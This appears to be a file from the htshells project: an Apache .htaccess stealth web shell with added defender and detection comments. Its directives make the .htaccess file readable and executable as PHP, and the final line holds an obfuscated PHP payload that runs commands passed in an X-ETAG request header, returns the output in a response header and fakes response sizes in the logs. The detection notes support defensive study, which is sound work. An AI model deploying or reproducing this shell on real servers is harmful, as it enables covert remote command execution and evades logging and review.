mubix/htshells/master/mod_php.stealth-shell.htaccess - Htaccess File


# Self contained .htaccess stealth web shell - Part of the htshell project
# Written by Wireghoul -
#
# Defender summary: this file only takes effect where the server honours
# per-directory overrides; `AllowOverride None` in the main server config
# stops Apache from reading .htaccess files at all. A legitimate .htaccess has
# no reason to map itself to a PHP handler or to contain a PHP open tag, so
# either one is a strong indicator during file-integrity or web-root review.

# Override default deny rule to make .htaccess file accessible over web
# Detection: an access rule that re-allows files starting with ".ht" reverses
# the protection stock Apache configs apply to .htaccess/.htpasswd.
<Files ~ "^.ht">
    Order allow,deny
    Allow from all

# Make the .htaccess file be interpreted as a PHP file. This occurs after Apache has
# interpreted the Apache directives from the .htaccess file.
# Detection: AddType/AddHandler/SetHandler mapping a dotfile to PHP.
AddType application/x-httpd-php .htaccess

# Enable output buffering so we can fudge content length in logs (see the ob_* calls)
# php_value is a mod_php directive, matching the "mod_php" in the file name.
php_value output_buffering 1

# Rewrite supposed url to the .htaccess file if X-ETAG request header is set
# Detection: the trigger is a request header, not the URL, so the logged path can
# be any URL under this directory. X-ETAG is not a standard request header;
# adding %{X-ETAG}i to the access LogFormat makes these requests visible.
RewriteEngine on
RewriteCond %{HTTP:X-ETAG} !^$
RewriteRule .* .htaccess [L]

# Set $e to exec(), discard 2 byte padding on base64 encoding (breaks automated decoding), payload in X-ETAG header
# Then make sure the log contains a 200 ok response with response size of 9326 (should match the file you are impersonating or a code in a 404 response)
# Detection: the function names are assembled from string fragments at runtime,
# so searching for the literal names misses this line; match on a PHP open tag
# inside .htaccess instead. In access logs, look for 200 responses with the same
# body size (9326 here) across unrelated URLs, and for responses that carry an
# X-ETAG header. Input and output both travel in headers, which common/combined
# log formats do not record.
# SHELL <?php ob_clean(); $b= "base64"."_decode"; $e = str_replace('y','e','yxyc'); $e($b(substr($_SERVER['HTTP_X_ETAG'],2))." 2>&1", $o); header("X-ETAG: AA".base64_encode(implode("rn ", $o))); print str_repeat("A", 9326); ob_flush(); exit(); ?>

